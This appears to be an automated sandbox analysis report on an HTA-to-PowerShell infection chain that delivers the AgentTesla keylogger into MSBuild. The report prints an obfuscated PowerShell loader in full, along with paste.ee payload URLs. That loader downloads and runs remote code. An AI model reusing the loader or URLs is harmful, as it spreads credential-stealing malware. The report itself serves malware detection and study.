                        Source: powershell.exe, 00000005.00000002.1853721064.0000000005ADF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1875380332.00000000093E0000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: https://github.com/dahall/taskscheduler
                        Source: wscript.exe, 00000003.00000003.1739537955.0000000005CE0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1729587301.0000000005E23000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1737440948.0000000005C2F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1729945522.0000000005E37000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.1744752845.0000000005C1C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1730057843.0000000005E40000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1729587301.0000000005E37000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1729993367.0000000005E40000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1737440948.0000000005C62000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.1744856736.0000000005C5E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1738271465.0000000005E40000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.1744856736.0000000005C62000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1729776106.0000000005E34000.00000004.00000020.00020000.00000000.sdmp, 0[1].txt.3.dr String found in binary or memory: https://github.com/koswald/VBScript
                        Source: wscript.exe, 00000003.00000003.1738271465.0000000005E40000.00000004.00000020.00020000.00000000.sdmp, 0[1].txt.3.dr String found in binary or memory: https://github.com/koswald/VBScript/blob/master/ProjectInfo.vbs
                        Source: wscript.exe, 00000003.00000003.1739537955.0000000005CE0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1737440948.0000000005C2F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1729945522.0000000005E37000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.1744752845.0000000005C1C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1730057843.0000000005E40000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1729587301.0000000005E37000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1729993367.0000000005E40000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1738271465.0000000005E40000.00000004.00000020.00020000.00000000.sdmp, 0[1].txt.3.dr String found in binary or memory: https://github.com/koswald/VBScript/blob/master/SetupPerUser.md
                        Source: wscript.exe, 00000003.00000003.1729945522.0000000005E37000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1730057843.0000000005E40000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1729587301.0000000005E37000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1729993367.0000000005E40000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1738271465.0000000005E40000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/koswald/VBScriptp_
                        Source: wscript.exe, 00000003.00000002.1743609926.0000000002B37000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1738450202.0000000002B36000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1738030076.0000000002B35000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
                        Source: powershell.exe, 00000005.00000002.1853721064.000000000599B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                        Source: wscript.exe, 00000003.00000002.1743609926.0000000002B37000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1738450202.0000000002B36000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1738030076.0000000002B35000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/
                        Source: wscript.exe, 00000003.00000002.1743172680.0000000002A50000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.1744856736.0000000005C62000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.1743533343.0000000002B07000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1738691504.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, morninghtaaaafilex.hta, octupole.vbs.1.dr, misdivide.bat.0.drString found in binary or memory: https://paste.ee/d/rrpcUbe1/0
                        Source: wscript.exe, 00000003.00000002.1743609926.0000000002B37000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1738450202.0000000002B36000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1738030076.0000000002B35000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/d/rrpcUbe1/0$
                        Source: wscript.exe, 00000003.00000003.1742599910.0000000002A97000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.1743304735.0000000002A97000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/d/rrpcUbe1/0?
                        Source: wscript.exe, 00000003.00000002.1743609926.0000000002B37000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1738450202.0000000002B36000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1738030076.0000000002B35000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/d/rrpcUbe1/0B
                        Source: wscript.exe, 00000003.00000002.1743172680.0000000002A50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/d/rrpcUbe1/88
                        Source: wscript.exe, 00000003.00000003.1739105346.0000000002B2D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1738030076.0000000002B4D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1739589814.0000000004F03000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.1743533343.0000000002B2D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.gravatar.com
                        Source: wscript.exe, 00000003.00000003.1739853725.0000000002AC2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.1743533343.0000000002B2D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://themes.googleusercontent.com
                        Source: wscript.exe, 00000003.00000003.1739105346.0000000002B2D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1738030076.0000000002B4D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1739589814.0000000004F03000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.1743533343.0000000002B2D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
                        Source: wscript.exe, 00000003.00000003.1739853725.0000000002AC2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.1743533343.0000000002B2D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com;
                        Source: wscript.exe, 00000003.00000003.1739105346.0000000002B2D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1738030076.0000000002B4D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1739589814.0000000004F03000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.1743533343.0000000002B2D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
                        Source: unknown | Network traffic detected: HTTP traffic on port 49733 -> 443
                        Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49733
                        Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49832
                        Source: unknown | Network traffic detected: HTTP traffic on port 49841 -> 443
                        Source: unknown | Network traffic detected: HTTP traffic on port 49675 -> 443
                        Source: unknown | Network traffic detected: HTTP traffic on port 49734 -> 443
                        Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49831
                        Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49841
                        Source: unknown | Network traffic detected: HTTP traffic on port 49672 -> 443
                        Source: unknown | Network traffic detected: HTTP traffic on port 49844 -> 443
                        Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49672
                        Source: unknown | Network traffic detected: HTTP traffic on port 49855 -> 443
                        Source: unknown | Network traffic detected: HTTP traffic on port 49832 -> 443
                        Source: unknown | Network traffic detected: HTTP traffic on port 49833 -> 443
                        Source: unknown | Network traffic detected: HTTP traffic on port 49831 -> 443
                        Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49734
                        Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49833
                        Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49844
                        Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49855
                        Source: unknown | HTTPS traffic detected: 23.186.113.60:443 -> 192.168.2.4:49733 version: TLS 1.2
                        Source: unknown | HTTPS traffic detected: 142.215.209.72:443 -> 192.168.2.4:49734 version: TLS 1.2
                        Source: unknown | HTTPS traffic detected: 150.171.28.10:443 -> 192.168.2.4:49831 version: TLS 1.2
                        Source: unknown | HTTPS traffic detected: 150.171.28.10:443 -> 192.168.2.4:49832 version: TLS 1.2
                        Source: unknown | HTTPS traffic detected: 150.171.28.10:443 -> 192.168.2.4:49833 version: TLS 1.2
                        Source: unknown | HTTPS traffic detected: 150.171.28.10:443 -> 192.168.2.4:49841 version: TLS 1.2
                        Source: unknown | HTTPS traffic detected: 150.171.28.10:443 -> 192.168.2.4:49841 version: TLS 1.2

                        Key, Mouse, Clipboard, Microphone and Screen Capturing

                        Source: 5.2.powershell.exe.5e0e358.7.raw.unpack, xljC6U.cs | .Net Code: YPw7g

                        System Summary

                        Source: 8.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                        Source: 8.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                        Source: 5.2.powershell.exe.5e0e358.7.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                        Source: 5.2.powershell.exe.5e0e358.7.unpack, type: UNPACKEDPE | Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                        Source: 5.2.powershell.exe.5e0e358.7.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                        Source: 5.2.powershell.exe.5e0e358.7.raw.unpack, type: UNPACKEDPE | Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                        Source: Process Memory Space: powershell.exe PID: 7624, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                        Source: C:\Windows\SysWOW64\wscript.exe | COM Object queried: XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}
                        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "$Codigo = 'J#Bl#Hg#a#Bh#HU#cwB0#GU#Z##g#D0#I##n#HQ#e#B0#C4#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##2#GU#cwBh#GI#Lw#3#DE#Lg#w#DI#Mg#u#DM#Lg#y#Dk#MQ#v#C8#OgBw#HQ#d#Bo#Cc#Ow#k#HM#bgBp#HQ#d#B5#C##PQ#g#CQ#ZQB4#Gg#YQB1#HM#d#Bl#GQ#I##t#HI#ZQBw#Gw#YQBj#GU#I##n#CM#Jw#s#C##JwB0#Cc#Ow#k#HM#a#Bv#HY#ZQBs#GE#cgBk#C##PQ#g#Cc#a#B0#HQ#c#Bz#Do#Lw#v#DE#M##w#Dc#LgBm#Gk#b#Bl#G0#YQBp#Gw#LgBj#G8#bQ#v#GE#c#Bp#C8#ZgBp#Gw#ZQ#v#Gc#ZQB0#D8#ZgBp#Gw#ZQBr#GU#eQ#9#EU#UwBZ#FQ#aQBU#FI#MwBP#D##MwBF#DU#cQBy#E0#bgBJ#Hk#eQBX#HQ#WQBm#DU#TwBN#EY#VQ#w#G0#YQBr#Hg#TQB1#D##ZQBQ#HE#UgBS#Eo#TgBp#GM#TgBq#EM#Mw#2#GE#O#BU#DI#agBH#GY#VwBU#DY#RgBF#EI#ag#1#HM#JgBw#Gs#XwB2#Gk#Z##9#DM#N##y#Dg#M##z#GQ#MQBj#GM#N#Bl#DM#Yg#4#D##MQ#3#DQ#M##2#DY#Nw#w#DU#M##4#D##YQ#1#GU#Zg#n#Ds#J#Bv#HI#ZwBh#G4#bwBs#GE#bgB0#Gg#YQBu#HU#bQ#g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#J#Bz#HQ#aQBs#GI#ZQBu#GU#I##9#C##J#Bv#HI#ZwBh#G4#bwBs#GE#bgB0#Gg#YQBu#HU#bQ#u#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#Cg#J#Bz#Gg#bwB2#GU#b#Bh#HI#Z##p#Ds#J#Bn#GU#cgB1#G4#Z#Bp#GE#b#Bs#Hk#I##9#C##WwBT#Hk#cwB0#GU#bQ#u#FQ#ZQB4#HQ#LgBF#G4#YwBv#GQ#aQBu#Gc#XQ#6#Do#VQBU#EY#O##u#Ec#ZQB0#FM#d#By#Gk#bgBn#Cg#J#Bz#HQ#aQBs#GI#ZQBu#GU#KQ#7#CQ#ZQB0#Gg#bQBv#HY#bwBt#GU#cgBp#G4#ZQ#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#FM#V#BB#FI#V##+#D4#Jw#7#CQ#bwBy#Gk#ZwBp#G4#YQBy#Hk#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBF#E4#R##+#D4#Jw#7#CQ#bgBv#G4#YwBs#G8#d#Bo#Gk#bgBn#C##PQ#g#CQ#ZwBl#HI#dQBu#GQ#aQBh#Gw#b#B5#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#ZQB0#Gg#bQBv#HY#bwBt#GU#cgBp#G4#ZQ#p#Ds#J#Bt#GU#d#Bv#G4#eQBt#HM#I##9#C##J#Bn#GU#cgB1#G4#Z#Bp#GE#b#Bs#Hk#LgBJ#G4#Z#Bl#Hg#TwBm#Cg#J#Bv#HI#aQBn#Gk#bgBh#HI#eQ#p#Ds#J#Bu#G8#bgBj#Gw#bwB0#Gg#aQBu#Gc#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#Bt#GU#d#Bv#G4#eQBt#HM#I##t#Gc#d##g#CQ#bgBv#G4#YwBs#G8#d#Bo#Gk#bg
Bn#Ds#J#Bu#G8#bgBj#Gw#bwB0#Gg#aQBu#Gc#I##r#D0#I##k#GU#d#Bo#G0#bwB2#G8#bQBl#HI#aQBu#GU#LgBM#GU#bgBn#HQ#a##7#CQ#cwBw#GE#YwBp#GU#cg#g#D0#I##k#G0#ZQB0#G8#bgB5#G0#cw#g#C0#I##k#G4#bwBu#GM#b#Bv#HQ#a#Bp#G4#Zw#7#CQ#cwB1#GI#agBl#GM#d##g#D0#I##k#Gc#ZQBy#HU#bgBk#Gk#YQBs#Gw#eQ#u#FM#dQBi#HM#d#By#Gk#bgBn#Cg#J#Bu#G8#bgBj#Gw#bwB0#Gg#aQBu#Gc#L##g#CQ#cwBw#GE#YwBp#GU#cg#p#Ds#J#Bn#HI#eQBs#Gw#dQBz#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBD#G8#bgB2#GU#cgB0#F0#Og#6#EY#cgBv#G0#QgBh#HM#ZQ#2#DQ#UwB0#HI#aQBu#Gc#K##k#HM#dQBi#Go#ZQBj#HQ#KQ#7#CQ#YgBh#GM#awBj#Gg#YQBu#G4#ZQBs#HM#I##9#C##WwBT#Hk#cwB0#GU#bQ#u#FI#ZQBm#Gw#ZQBj#HQ#aQBv#G4#LgBB#HM#cwBl#G0#YgBs#Hk#XQ#6#Do#T#Bv#GE#Z##o#CQ#ZwBy#Hk#b#Bs#HU#cw#p#Ds#J#Bp#G4#YwBs#GU#I##9#C##WwBk#G4#b#Bp#GI#LgBJ#E8#LgBI#G8#bQBl#F0#LgBH#GU#d#BN#GU#d#Bo#G8#Z##o#Cc#VgBB#Ek#Jw#p#C4#SQBu#HY#bwBr#GU#K##k#G4#dQBs#Gw#L##g#Fs#bwBi#Go#ZQBj#HQ#WwBd#F0#I#B##Cg#J#Bz#G4#aQB0#HQ#eQ#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#TQBT#EI#dQBp#Gw#Z##n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Ck#KQ#='; $OWjuxd = [System.Text.Encoding]::Unicode.GetString([Convert]::From
                        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "$Codigo = 'J#Bl#Hg#a#Bh#HU#cwB0#GU#Z##g#D0#I##n#HQ#e#B0#C4#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##2#GU#cwBh#GI#Lw#3#DE#Lg#w#DI#Mg#u#DM#Lg#y#Dk#MQ#v#C8#OgBw#HQ#d#Bo#Cc#Ow#k#HM#bgBp#HQ#d#B5#C##PQ#g#CQ#ZQB4#Gg#YQB1#HM#d#Bl#GQ#I##t#HI#ZQBw#Gw#YQBj#GU#I##n#CM#Jw#s#C##JwB0#Cc#Ow#k#HM#a#Bv#HY#ZQBs#GE#cgBk#C##PQ#g#Cc#a#B0#HQ#c#Bz#Do#Lw#v#DE#M##w#Dc#LgBm#Gk#b#Bl#G0#YQBp#Gw#LgBj#G8#bQ#v#GE#c#Bp#C8#ZgBp#Gw#ZQ#v#Gc#ZQB0#D8#ZgBp#Gw#ZQBr#GU#eQ#9#EU#UwBZ#FQ#aQBU#FI#MwBP#D##MwBF#DU#cQBy#E0#bgBJ#Hk#eQBX#HQ#WQBm#DU#TwBN#EY#VQ#w#G0#YQBr#Hg#TQB1#D##ZQBQ#HE#UgBS#Eo#TgBp#GM#TgBq#EM#Mw#2#GE#O#BU#DI#agBH#GY#VwBU#DY#RgBF#EI#ag#1#HM#JgBw#Gs#XwB2#Gk#Z##9#DM#N##y#Dg#M##z#GQ#MQBj#GM#N#Bl#DM#Yg#4#D##MQ#3#DQ#M##2#DY#Nw#w#DU#M##4#D##YQ#1#GU#Zg#n#Ds#J#Bv#HI#ZwBh#G4#bwBs#GE#bgB0#Gg#YQBu#HU#bQ#g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#J#Bz#HQ#aQBs#GI#ZQBu#GU#I##9#C##J#Bv#HI#ZwBh#G4#bwBs#GE#bgB0#Gg#YQBu#HU#bQ#u#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#Cg#J#Bz#Gg#bwB2#GU#b#Bh#HI#Z##p#Ds#J#Bn#GU#cgB1#G4#Z#Bp#GE#b#Bs#Hk#I##9#C##WwBT#Hk#cwB0#GU#bQ#u#FQ#ZQB4#HQ#LgBF#G4#YwBv#GQ#aQBu#Gc#XQ#6#Do#VQBU#EY#O##u#Ec#ZQB0#FM#d#By#Gk#bgBn#Cg#J#Bz#HQ#aQBs#GI#ZQBu#GU#KQ#7#CQ#ZQB0#Gg#bQBv#HY#bwBt#GU#cgBp#G4#ZQ#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#FM#V#BB#FI#V##+#D4#Jw#7#CQ#bwBy#Gk#ZwBp#G4#YQBy#Hk#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBF#E4#R##+#D4#Jw#7#CQ#bgBv#G4#YwBs#G8#d#Bo#Gk#bgBn#C##PQ#g#CQ#ZwBl#HI#dQBu#GQ#aQBh#Gw#b#B5#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#ZQB0#Gg#bQBv#HY#bwBt#GU#cgBp#G4#ZQ#p#Ds#J#Bt#GU#d#Bv#G4#eQBt#HM#I##9#C##J#Bn#GU#cgB1#G4#Z#Bp#GE#b#Bs#Hk#LgBJ#G4#Z#Bl#Hg#TwBm#Cg#J#Bv#HI#aQBn#Gk#bgBh#HI#eQ#p#Ds#J#Bu#G8#bgBj#Gw#bwB0#Gg#aQBu#Gc#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#Bt#GU#d#Bv#G4#eQBt#HM#I##t#Gc#d##g#CQ#bgBv#G4#YwBs#G8#d#Bo#Gk#bg
Bn#Ds#J#Bu#G8#bgBj#Gw#bwB0#Gg#aQBu#Gc#I##r#D0#I##k#GU#d#Bo#G0#bwB2#G8#bQBl#HI#aQBu#GU#LgBM#GU#bgBn#HQ#a##7#CQ#cwBw#GE#YwBp#GU#cg#g#D0#I##k#G0#ZQB0#G8#bgB5#G0#cw#g#C0#I##k#G4#bwBu#GM#b#Bv#HQ#a#Bp#G4#Zw#7#CQ#cwB1#GI#agBl#GM#d##g#D0#I##k#Gc#ZQBy#HU#bgBk#Gk#YQBs#Gw#eQ#u#FM#dQBi#HM#d#By#Gk#bgBn#Cg#J#Bu#G8#bgBj#Gw#bwB0#Gg#aQBu#Gc#L##g#CQ#cwBw#GE#YwBp#GU#cg#p#Ds#J#Bn#HI#eQBs#Gw#dQBz#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBD#G8#bgB2#GU#cgB0#F0#Og#6#EY#cgBv#G0#QgBh#HM#ZQ#2#DQ#UwB0#HI#aQBu#Gc#K##k#HM#dQBi#Go#ZQBj#HQ#KQ#7#CQ#YgBh#GM#awBj#Gg#YQBu#G4#ZQBs#HM#I##9#C##WwBT#Hk#cwB0#GU#bQ#u#FI#ZQBm#Gw#ZQBj#HQ#aQBv#G4#LgBB#HM#cwBl#G0#YgBs#Hk#XQ#6#Do#T#Bv#GE#Z##o#CQ#ZwBy#Hk#b#Bs#HU#cw#p#Ds#J#Bp#G4#YwBs#GU#I##9#C##WwBk#G4#b#Bp#GI#LgBJ#E8#LgBI#G8#bQBl#F0#LgBH#GU#d#BN#GU#d#Bo#G8#Z##o#Cc#VgBB#Ek#Jw#p#C4#SQBu#HY#bwBr#GU#K##k#G4#dQBs#Gw#L##g#Fs#bwBi#Go#ZQBj#HQ#WwBd#F0#I#B##Cg#J#Bz#G4#aQB0#HQ#eQ#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#TQBT#EI#dQBp#Gw#Z##n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Ck#KQ#='; $OWjuxd = [System.Text.Encoding]::Unicode.GetString([Convert]::FromJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_00C3DAF0 | 5_2_00C3DAF0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 8_2_0101B6B2 | 8_2_0101B6B2
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 8_2_01014AC8 | 8_2_01014AC8
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 8_2_01013EB0 | 8_2_01013EB0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 8_2_010141F8 | 8_2_010141F8
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 8_2_0101AB38 | 8_2_0101AB38
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 8_2_0101ABF3 | 8_2_0101ABF3
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 8_2_062A4200 | 8_2_062A4200
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 8_2_062A3050 | 8_2_062A3050
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 8_2_062A59A8 | 8_2_062A59A8
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 8_2_062A0040 | 8_2_062A0040
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 8_2_062A52C0 | 8_2_062A52C0
                        Source: C:\Windows\SysWOW64\mshta.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
                        Source: C:\Windows\SysWOW64\wscript.exe | Process created: Commandline size = 3009
                        Source: C:\Windows\SysWOW64\wscript.exe | Process created: Commandline size = 3009
                        Source: 8.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                        Source: 8.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                        Source: 5.2.powershell.exe.5e0e358.7.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                        Source: 5.2.powershell.exe.5e0e358.7.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                        Source: 5.2.powershell.exe.5e0e358.7.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                        Source: 5.2.powershell.exe.5e0e358.7.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                        Source: Process Memory Space: powershell.exe PID: 7624, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                        Source: 5.2.powershell.exe.5e0e358.7.raw.unpack, 9O2OLI.cs | Cryptographic APIs: 'CreateDecryptor', 'TransformBlock'
                        Source: 5.2.powershell.exe.5e0e358.7.raw.unpack, hdYUG.cs | Cryptographic APIs: 'TransformFinalBlock'
                        Source: 5.2.powershell.exe.5e0e358.7.raw.unpack, LGBZ4N2f.cs | Cryptographic APIs: 'TransformFinalBlock'
                        Source: 5.2.powershell.exe.5e0e358.7.raw.unpack, F8OmG.cs | Cryptographic APIs: 'CreateDecryptor'
                        Source: 5.2.powershell.exe.5e0e358.7.raw.unpack, Bgo.cs | Cryptographic APIs: 'TransformFinalBlock'
                        Source: 5.2.powershell.exe.5e0e358.7.raw.unpack, k7FmsUgnvL.cs | Cryptographic APIs: 'TransformFinalBlock'
                        Source: 5.2.powershell.exe.5e0e358.7.raw.unpack, dVjkZ3EEsen.cs | Cryptographic APIs: 'TransformFinalBlock'
                        Source: 5.2.powershell.exe.5e0e358.7.raw.unpack, dVjkZ3EEsen.cs | Cryptographic APIs: 'TransformFinalBlock'
                        Source: 5.2.powershell.exe.5e0e358.7.raw.unpack, dVjkZ3EEsen.cs | Cryptographic APIs: 'TransformFinalBlock'
                        Source: 5.2.powershell.exe.5e0e358.7.raw.unpack, dVjkZ3EEsen.cs | Cryptographic APIs: 'TransformFinalBlock'
                        Source: classification engine | Classification label: mal100.spre.troj.spyw.expl.evad.winHTA@15/7@4/4
                        Source: C:\Windows\SysWOW64\wscript.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\0[1].txt
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Mutant created: NULL
                        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7632:120:WilError_03
                        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7468:120:WilError_03
                        Source: C:\Windows\SysWOW64\mshta.exe | File created: C:\Windows\Temp\misdivide.bat
                        Source: C:\Windows\SysWOW64\mshta.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Windows\Temp\misdivide.bat
